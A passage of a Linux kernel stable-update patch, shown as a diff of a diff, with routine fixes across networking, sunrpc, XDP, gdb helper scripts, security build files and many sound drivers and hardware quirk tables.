+ 	[TCA_FQ_FLOW_PLIMIT]		= { .type = NLA_U32 },
+ 	[TCA_FQ_QUANTUM]		= { .type = NLA_U32 },
+-	[TCA_FQ_INITIAL_QUANTUM]	= { .type = NLA_U32 },
++	[TCA_FQ_INITIAL_QUANTUM]	= NLA_POLICY_FULL_RANGE(NLA_U32, &iq_range),
+ 	[TCA_FQ_RATE_ENABLE]		= { .type = NLA_U32 },
+ 	[TCA_FQ_FLOW_DEFAULT_RATE]	= { .type = NLA_U32 },
+ 	[TCA_FQ_FLOW_MAX_RATE]		= { .type = NLA_U32 },
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index fd7e1c630493e..d2ee566343083 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -2050,9 +2050,6 @@ call_bind_status(struct rpc_task *task)
+ 			status = -EOPNOTSUPP;
+ 			break;
+ 		}
+-		if (task->tk_rebind_retry == 0)
+-			break;
+-		task->tk_rebind_retry--;
+ 		rpc_delay(task, 3*HZ);
+ 		goto retry_timeout;
+ 	case -ENOBUFS:
+diff --git a/net/sunrpc/sched.c b/net/sunrpc/sched.c
+index be587a308e05a..c8321de341eea 100644
+--- a/net/sunrpc/sched.c
++++ b/net/sunrpc/sched.c
+@@ -817,7 +817,6 @@ rpc_init_task_statistics(struct rpc_task *task)
+ 	/* Initialize retry counters */
+ 	task->tk_garb_retry = 2;
+ 	task->tk_cred_retry = 2;
+-	task->tk_rebind_retry = 2;
+ 
+ 	/* starting timestamp */
+ 	task->tk_start = ktime_get();
+diff --git a/net/xdp/xsk_queue.h b/net/xdp/xsk_queue.h
+index c6fb6b7636582..bdeba20aaf8ff 100644
+--- a/net/xdp/xsk_queue.h
++++ b/net/xdp/xsk_queue.h
+@@ -161,6 +161,7 @@ static inline bool xp_unaligned_validate_desc(struct xsk_buff_pool *pool,
+ 		return false;
+ 
+ 	if (base_addr >= pool->addrs_cnt || addr >= pool->addrs_cnt ||
++	    addr + desc->len > pool->addrs_cnt ||
+ 	    xp_desc_crosses_non_contig_pg(pool, addr, desc->len))
+ 		return false;
+ 
+diff --git a/net/xdp/xskmap.c b/net/xdp/xskmap.c
+index 771d0fa90ef58..3436a8efb8dc7 100644
+--- a/net/xdp/xskmap.c
++++ b/net/xdp/xskmap.c
+@@ -150,8 +150,8 @@ static void *xsk_map_lookup_elem_sys_only(struct bpf_map *map, void *key)
+ 	return ERR_PTR(-EOPNOTSUPP);
+ }
+ 
+-static int xsk_map_update_elem(struct bpf_map *map, void *key, void *value,
+-			       u64 map_flags)
++static long xsk_map_update_elem(struct bpf_map *map, void *key, void *value,
++				u64 map_flags)
+ {
+ 	struct xsk_map *m = container_of(map, struct xsk_map, map);
+ 	struct xdp_sock __rcu **map_entry;
+@@ -211,7 +211,7 @@ out:
+ 	return err;
+ }
+ 
+-static int xsk_map_delete_elem(struct bpf_map *map, void *key)
++static long xsk_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct xsk_map *m = container_of(map, struct xsk_map, map);
+ 	struct xdp_sock __rcu **map_entry;
+@@ -231,7 +231,7 @@ static int xsk_map_delete_elem(struct bpf_map *map, void *key)
+ 	return 0;
+ }
+ 
+-static int xsk_map_redirect(struct bpf_map *map, u64 index, u64 flags)
++static long xsk_map_redirect(struct bpf_map *map, u64 index, u64 flags)
+ {
+ 	return __bpf_xdp_redirect_map(map, index, flags, 0,
+ 				      __xsk_map_lookup_elem);
+diff --git a/scripts/gdb/linux/clk.py b/scripts/gdb/linux/clk.py
+index 061aecfa294e6..7a01fdc3e8446 100644
+--- a/scripts/gdb/linux/clk.py
++++ b/scripts/gdb/linux/clk.py
+@@ -41,6 +41,8 @@ are cached and potentially out of date"""
+             self.show_subtree(child, level + 1)
+ 
+     def invoke(self, arg, from_tty):
++        if utils.gdb_eval_or_none("clk_root_list") is None:
++            raise gdb.GdbError("No clocks registered")
+         gdb.write("                                 enable  prepare  protect               \n")
+         gdb.write("   clock                          count    count    count        rate   \n")
+         gdb.write("------------------------------------------------------------------------\n")
+diff --git a/scripts/gdb/linux/constants.py.in b/scripts/gdb/linux/constants.py.in
+index 2efbec6b6b8db..08f0587d15ea1 100644
+--- a/scripts/gdb/linux/constants.py.in
++++ b/scripts/gdb/linux/constants.py.in
+@@ -39,6 +39,8 @@
+ 
+ import gdb
+ 
++LX_CONFIG(CONFIG_DEBUG_INFO_REDUCED)
++
+ /* linux/clk-provider.h */
+ if IS_BUILTIN(CONFIG_COMMON_CLK):
+     LX_GDBPARSED(CLK_GET_RATE_NOCACHE)
+diff --git a/scripts/gdb/linux/genpd.py b/scripts/gdb/linux/genpd.py
+index 39cd1abd85590..b53649c0a77a6 100644
+--- a/scripts/gdb/linux/genpd.py
++++ b/scripts/gdb/linux/genpd.py
+@@ -5,7 +5,7 @@
+ import gdb
+ import sys
+ 
+-from linux.utils import CachedType
++from linux.utils import CachedType, gdb_eval_or_none
+ from linux.lists import list_for_each_entry
+ 
+ generic_pm_domain_type = CachedType('struct generic_pm_domain')
+@@ -70,6 +70,8 @@ Output is similar to /sys/kernel/debug/pm_genpd/pm_genpd_summary'''
+             gdb.write('    %-50s  %s\n' % (kobj_path, rtpm_status_str(dev)))
+ 
+     def invoke(self, arg, from_tty):
++        if gdb_eval_or_none("&gpd_list") is None:
++            raise gdb.GdbError("No power domain(s) registered")
+         gdb.write('domain                          status          children\n');
+         gdb.write('    /device                                             runtime status\n');
+         gdb.write('----------------------------------------------------------------------\n');
+diff --git a/scripts/gdb/linux/timerlist.py b/scripts/gdb/linux/timerlist.py
+index 071d0dd5a6349..51def847f1ef9 100644
+--- a/scripts/gdb/linux/timerlist.py
++++ b/scripts/gdb/linux/timerlist.py
+@@ -73,7 +73,7 @@ def print_cpu(hrtimer_bases, cpu, max_clock_bases):
+     ts = cpus.per_cpu(tick_sched_ptr, cpu)
+ 
+     text = "cpu: {}\n".format(cpu)
+-    for i in xrange(max_clock_bases):
++    for i in range(max_clock_bases):
+         text += " clock {}:\n".format(i)
+         text += print_base(cpu_base['clock_base'][i])
+ 
+@@ -158,6 +158,8 @@ def pr_cpumask(mask):
+     num_bytes = (nr_cpu_ids + 7) / 8
+     buf = utils.read_memoryview(inf, bits, num_bytes).tobytes()
+     buf = binascii.b2a_hex(buf)
++    if type(buf) is not str:
++        buf=buf.decode()
+ 
+     chunks = []
+     i = num_bytes
+diff --git a/scripts/gdb/linux/utils.py b/scripts/gdb/linux/utils.py
+index 1553f68716cc2..7f36aee32ac66 100644
+--- a/scripts/gdb/linux/utils.py
++++ b/scripts/gdb/linux/utils.py
+@@ -88,7 +88,10 @@ def get_target_endianness():
+ 
+ 
+ def read_memoryview(inf, start, length):
+-    return memoryview(inf.read_memory(start, length))
++    m = inf.read_memory(start, length)
++    if type(m) is memoryview:
++        return m
++    return memoryview(m)
+ 
+ 
+ def read_u16(buffer, offset):
+diff --git a/scripts/gdb/vmlinux-gdb.py b/scripts/gdb/vmlinux-gdb.py
+index 3e8d3669f0ce0..5564ffe8ae327 100644
+--- a/scripts/gdb/vmlinux-gdb.py
++++ b/scripts/gdb/vmlinux-gdb.py
+@@ -22,6 +22,10 @@ except:
+     gdb.write("NOTE: gdb 7.2 or later required for Linux helper scripts to "
+               "work.\n")
+ else:
++    import linux.constants
++    if linux.constants.LX_CONFIG_DEBUG_INFO_REDUCED:
++        raise gdb.GdbError("Reduced debug information will prevent GDB "
++                           "from having complete types.\n")
+     import linux.utils
+     import linux.symbols
+     import linux.modules
+@@ -32,7 +36,6 @@ else:
+     import linux.lists
+     import linux.rbtree
+     import linux.proc
+-    import linux.constants
+     import linux.timerlist
+     import linux.clk
+     import linux.genpd
+diff --git a/security/integrity/ima/Kconfig b/security/integrity/ima/Kconfig
+index 39caeca474449..60a511c6b583e 100644
+--- a/security/integrity/ima/Kconfig
++++ b/security/integrity/ima/Kconfig
+@@ -8,7 +8,7 @@ config IMA
+ 	select CRYPTO_HMAC
+ 	select CRYPTO_SHA1
+ 	select CRYPTO_HASH_INFO
+-	select TCG_TPM if HAS_IOMEM && !UML
++	select TCG_TPM if HAS_IOMEM
+ 	select TCG_TIS if TCG_TPM && X86
+ 	select TCG_CRB if TCG_TPM && ACPI
+ 	select TCG_IBMVTPM if TCG_TPM && PPC_PSERIES
+diff --git a/security/selinux/Makefile b/security/selinux/Makefile
+index 7761624448826..0aecf9334ec31 100644
+--- a/security/selinux/Makefile
++++ b/security/selinux/Makefile
+@@ -23,8 +23,8 @@ ccflags-y := -I$(srctree)/security/selinux -I$(srctree)/security/selinux/include
+ $(addprefix $(obj)/,$(selinux-y)): $(obj)/flask.h
+ 
+ quiet_cmd_flask = GEN     $(obj)/flask.h $(obj)/av_permissions.h
+-      cmd_flask = scripts/selinux/genheaders/genheaders $(obj)/flask.h $(obj)/av_permissions.h
++      cmd_flask = $< $(obj)/flask.h $(obj)/av_permissions.h
+ 
+ targets += flask.h av_permissions.h
+-$(obj)/flask.h: $(src)/include/classmap.h FORCE
++$(obj)/flask.h $(obj)/av_permissions.h &: scripts/selinux/genheaders/genheaders FORCE
+ 	$(call if_changed,flask)
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f70d6a33421d2..172ffc2c332b7 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9428,6 +9428,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8898, "HP EliteBook 845 G8 Notebook PC", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x88d0, "HP Pavilion 15-eh1xxx (mainboard 88D0)", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8902, "HP OMEN 16", ALC285_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x8919, "HP Pavilion Aero Laptop 13-be0xxx", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896d, "HP ZBook Firefly 16 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896e, "HP EliteBook x360 830 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8971, "HP EliteBook 830 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9478,6 +9479,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+@@ -9500,6 +9502,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1427, "Asus Zenbook UX31E", ALC269VB_FIXUP_ASUS_ZENBOOK),
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
++	SND_PCI_QUIRK(0x1043, 0x1683, "ASUS UM3402YAR", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16b2, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x16e3, "ASUS UX50", ALC269_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1740, "ASUS UX430UA", ALC295_FIXUP_ASUS_DACS),
+@@ -9689,6 +9692,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+diff --git a/sound/soc/amd/ps/pci-ps.c b/sound/soc/amd/ps/pci-ps.c
+index 489f01a206999..0e029aceb6d65 100644
+--- a/sound/soc/amd/ps/pci-ps.c
++++ b/sound/soc/amd/ps/pci-ps.c
+@@ -91,7 +91,6 @@ static int acp63_init(void __iomem *acp_base, struct device *dev)
+ 		dev_err(dev, "ACP reset failed\n");
+ 		return ret;
+ 	}
+-	acp63_writel(0x03, acp_base + ACP_CLKMUX_SEL);
+ 	acp63_enable_interrupts(acp_base);
+ 	return 0;
+ }
+@@ -106,7 +105,6 @@ static int acp63_deinit(void __iomem *acp_base, struct device *dev)
+ 		dev_err(dev, "ACP reset failed\n");
+ 		return ret;
+ 	}
+-	acp63_writel(0, acp_base + ACP_CLKMUX_SEL);
+ 	acp63_writel(0, acp_base + ACP_CONTROL);
+ 	return 0;
+ }
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 4a69ce702360c..0acdf0156f075 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -269,6 +269,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "8A43"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A22"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/cs35l41.c b/sound/soc/codecs/cs35l41.c
+index c223d83e02cfb..f2b5032daa6ae 100644
+--- a/sound/soc/codecs/cs35l41.c
++++ b/sound/soc/codecs/cs35l41.c
+@@ -356,6 +356,19 @@ static const struct snd_kcontrol_new cs35l41_aud_controls[] = {
+ 	WM_ADSP_FW_CONTROL("DSP1", 0),
+ };
+ 
++static void cs35l41_boost_enable(struct cs35l41_private *cs35l41, unsigned int enable)
++{
++	switch (cs35l41->hw_cfg.bst_type) {
++	case CS35L41_INT_BOOST:
++		enable = enable ? CS35L41_BST_EN_DEFAULT : CS35L41_BST_DIS_FET_OFF;
++		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2, CS35L41_BST_EN_MASK,
++				enable << CS35L41_BST_EN_SHIFT);
++		break;
++	default:
++		break;
++	}
++}
++
+ static irqreturn_t cs35l41_irq(int irq, void *data)
+ {
+ 	struct cs35l41_private *cs35l41 = data;
+@@ -431,8 +444,7 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 
+ 	if (status[0] & CS35L41_BST_OVP_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "VBST Over Voltage error\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_OVP_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -441,16 +453,13 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_OVP_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_OVP_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	if (status[0] & CS35L41_BST_DCM_UVP_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "DCM VBST Under Voltage Error\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_DCM_UVP_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -459,16 +468,13 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_UVP_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_UVP_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	if (status[0] & CS35L41_BST_SHORT_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "LBST error: powering off!\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_SHORT_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -477,9 +483,7 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_SHORT_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_SHORT_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+diff --git a/sound/soc/codecs/da7213.c b/sound/soc/codecs/da7213.c
+index 544ccbcfc8844..5678683c71bee 100644
+--- a/sound/soc/codecs/da7213.c
++++ b/sound/soc/codecs/da7213.c
+@@ -1996,6 +1996,11 @@ static int da7213_i2c_probe(struct i2c_client *i2c)
+ 	return ret;
+ }
+ 
++static void da7213_i2c_remove(struct i2c_client *i2c)
++{
++	pm_runtime_disable(&i2c->dev);
++}
++
+ static int __maybe_unused da7213_runtime_suspend(struct device *dev)
+ {
+ 	struct da7213_priv *da7213 = dev_get_drvdata(dev);
+@@ -2039,6 +2044,7 @@ static struct i2c_driver da7213_i2c_driver = {
+ 		.pm = &da7213_pm,
+ 	},
+ 	.probe_new	= da7213_i2c_probe,
++	.remove		= da7213_i2c_remove,
+ 	.id_table	= da7213_i2c_id,
+ };
+ 
+diff --git a/sound/soc/codecs/es8316.c b/sound/soc/codecs/es8316.c
+index 056c3082fe02c..f7d7a9c91e04c 100644
+--- a/sound/soc/codecs/es8316.c
++++ b/sound/soc/codecs/es8316.c
+@@ -842,12 +842,14 @@ static int es8316_i2c_probe(struct i2c_client *i2c_client)
+ 	es8316->irq = i2c_client->irq;
+ 	mutex_init(&es8316->lock);
+ 
+-	ret = devm_request_threaded_irq(dev, es8316->irq, NULL, es8316_irq,
+-					IRQF_TRIGGER_HIGH | IRQF_ONESHOT | IRQF_NO_AUTOEN,
+-					"es8316", es8316);
+-	if (ret) {
+-		dev_warn(dev, "Failed to get IRQ %d: %d\n", es8316->irq, ret);
+-		es8316->irq = -ENXIO;
++	if (es8316->irq > 0) {
++		ret = devm_request_threaded_irq(dev, es8316->irq, NULL, es8316_irq,
++						IRQF_TRIGGER_HIGH | IRQF_ONESHOT | IRQF_NO_AUTOEN,
++						"es8316", es8316);
++		if (ret) {
++			dev_warn(dev, "Failed to get IRQ %d: %d\n", es8316->irq, ret);
++			es8316->irq = -ENXIO;
++		}
+ 	}
+ 
+ 	return devm_snd_soc_register_component(&i2c_client->dev,
+diff --git a/sound/soc/fsl/fsl_mqs.c b/sound/soc/fsl/fsl_mqs.c
+index 4922e6795b73f..32d20d351bbf7 100644
+--- a/sound/soc/fsl/fsl_mqs.c
++++ b/sound/soc/fsl/fsl_mqs.c
+@@ -210,10 +210,10 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 		}
+ 
+ 		mqs_priv->regmap = syscon_node_to_regmap(gpr_np);
++		of_node_put(gpr_np);
+ 		if (IS_ERR(mqs_priv->regmap)) {
+ 			dev_err(&pdev->dev, "failed to get gpr regmap\n");
+-			ret = PTR_ERR(mqs_priv->regmap);
+-			goto err_free_gpr_np;
++			return PTR_ERR(mqs_priv->regmap);
+ 		}
+ 	} else {
+ 		regs = devm_platform_ioremap_resource(pdev, 0);
+@@ -242,8 +242,7 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 	if (IS_ERR(mqs_priv->mclk)) {
+ 		dev_err(&pdev->dev, "failed to get the clock: %ld\n",
+ 			PTR_ERR(mqs_priv->mclk));
+-		ret = PTR_ERR(mqs_priv->mclk);
+-		goto err_free_gpr_np;
++		return PTR_ERR(mqs_priv->mclk);
+ 	}
+ 
+ 	dev_set_drvdata(&pdev->dev, mqs_priv);
+@@ -252,13 +251,9 @@ static int fsl_mqs_probe(struct platform_device *pdev)
+ 	ret = devm_snd_soc_register_component(&pdev->dev, &soc_codec_fsl_mqs,
+ 			&fsl_mqs_dai, 1);
+ 	if (ret)
+-		goto err_free_gpr_np;
+-	return 0;
+-
+-err_free_gpr_np:
+-	of_node_put(gpr_np);
++		return ret;
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int fsl_mqs_remove(struct platform_device *pdev)
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index 79e0039c79a38..5a12940ef9070 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -533,6 +533,18 @@ static int byt_rt5640_aif1_hw_params(struct snd_pcm_substream *substream,
+ 
+ /* Please keep this list alphabetically sorted */
+ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
++	{	/* Acer Iconia One 7 B1-750 */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "VESPA2"),
++		},
++		.driver_data = (void *)(BYT_RT5640_DMIC1_MAP |
++					BYT_RT5640_JD_SRC_JD1_IN4P |
++					BYT_RT5640_OVCD_TH_1500UA |
++					BYT_RT5640_OVCD_SF_0P75 |
++					BYT_RT5640_SSP0_AIF1 |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{	/* Acer Iconia Tab 8 W1-810 */
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Acer"),
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index d2ed807abde95..767fa89d08708 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -213,6 +213,17 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 					SOF_SDW_PCH_DMIC |
+ 					RT711_JD1),
+ 	},
++	{
++		/* NUC15 'Rooks County' LAPRC510 and LAPRC710 skews */
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel(R) Client Systems"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LAPRC"),
++		},
++		.driver_data = (void *)(SOF_SDW_TGL_HDMI |
++					SOF_SDW_PCH_DMIC |
++					RT711_JD2_100K),
++	},
+ 	/* TigerLake-SDCA devices */
+ 	{
+ 		.callback = sof_sdw_quirk_cb,
+diff --git a/sound/soc/intel/common/soc-acpi-intel-adl-match.c b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+index 28dd2046e4ac5..d8c80041388a7 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-adl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+@@ -354,6 +354,20 @@ static const struct snd_soc_acpi_link_adr adl_sdw_rt711_link0_rt1316_link3[] = {
+ 	{}
+ };
+ 
++static const struct snd_soc_acpi_link_adr adl_sdw_rt711_link0_rt1316_link2[] = {
++	{
++		.mask = BIT(0),
++		.num_adr = ARRAY_SIZE(rt711_sdca_0_adr),
++		.adr_d = rt711_sdca_0_adr,
++	},
++	{
++		.mask = BIT(2),
++		.num_adr = ARRAY_SIZE(rt1316_2_single_adr),
++		.adr_d = rt1316_2_single_adr,
++	},
++	{}
++};
++
+ static const struct snd_soc_acpi_adr_device mx8373_2_adr[] = {
+ 	{
+ 		.adr = 0x000223019F837300ull,
+@@ -624,6 +638,12 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_sdw_machines[] = {
+ 		.drv_name = "sof_sdw",
+ 		.sof_tplg_filename = "sof-adl-rt711-l0-rt1316-l3.tplg",
+ 	},
++	{
++		.link_mask = 0x5, /* 2 active links required */
++		.links = adl_sdw_rt711_link0_rt1316_link2,
++		.drv_name = "sof_sdw",
++		.sof_tplg_filename = "sof-adl-rt711-l0-rt1316-l2.tplg",
++	},
+ 	{
+ 		.link_mask = 0x1, /* link0 required */
+ 		.links = adl_rvp,
+diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
+index e7aa6f360cabe..d649b0cf4744f 100644
+--- a/sound/soc/soc-compress.c
++++ b/sound/soc/soc-compress.c
+@@ -622,6 +622,9 @@ int snd_soc_new_compress(struct snd_soc_pcm_runtime *rtd, int num)
+ 			return ret;
+ 		}
+ 
++		/* inherit atomicity from DAI link */
++		be_pcm->nonatomic = rtd->dai_link->nonatomic;
++
+ 		rtd->pcm = be_pcm;
+ 		rtd->fe_compr = 1;
+ 		if (rtd->dai_link->dpcm_playback)
+diff --git a/sound/soc/soc-pcm.c b/sound/soc/soc-pcm.c
+index 579a44d81d9a3..d409b99af75b2 100644
+--- a/sound/soc/soc-pcm.c
++++ b/sound/soc/soc-pcm.c
+@@ -1649,10 +1649,14 @@ static void dpcm_runtime_setup_fe(struct snd_pcm_substream *substream)
+ 	struct snd_pcm_hardware *hw = &runtime->hw;
+ 	struct snd_soc_dai *dai;
+ 	int stream = substream->stream;
++	u64 formats = hw->formats;
+ 	int i;
+ 
+ 	soc_pcm_hw_init(hw);
+ 
++	if (formats)
++		hw->formats &= formats;
++
+ 	for_each_rtd_cpu_dais(fe, i, dai) {
+ 		struct snd_soc_pcm_stream *cpu_stream;
+ 
+diff --git a/sound/usb/quirks-table.h b/sound/usb/quirks-table.h
+index 271884e350035..efb4a3311cc59 100644
+--- a/sound/usb/quirks-table.h
++++ b/sound/usb/quirks-table.h
+@@ -3884,6 +3884,64 @@ YAMAHA_DEVICE(0x7010, "UB99"),
+ 	}
+ },
+ 
++{
++	/*
++	 * PIONEER DJ DDJ-800
++	 * PCM is 6 channels out, 6 channels in @ 44.1 fixed
++	 * The Feedback for the output is the input
++	 */
++	USB_DEVICE_VENDOR_SPEC(0x2b73, 0x0029),
++		.driver_info = (unsigned long) &(const struct snd_usb_audio_quirk) {
++		.ifnum = QUIRK_ANY_INTERFACE,
++		.type = QUIRK_COMPOSITE,
++		.data = (const struct snd_usb_audio_quirk[]) {
++			{
++				.ifnum = 0,
++				.type = QUIRK_AUDIO_FIXED_ENDPOINT,
++				.data = &(const struct audioformat) {
++					.formats = SNDRV_PCM_FMTBIT_S24_3LE,
++					.channels = 6,
++					.iface = 0,
++					.altsetting = 1,
++					.altset_idx = 1,
++					.endpoint = 0x01,
++					.ep_attr = USB_ENDPOINT_XFER_ISOC|
++						USB_ENDPOINT_SYNC_ASYNC,
++					.rates = SNDRV_PCM_RATE_44100,
++					.rate_min = 44100,
++					.rate_max = 44100,
++					.nr_rates = 1,
++					.rate_table = (unsigned int[]) { 44100 }
++				}
++			},
++			{
++				.ifnum = 0,
++				.type = QUIRK_AUDIO_FIXED_ENDPOINT,
++				.data = &(const struct audioformat) {
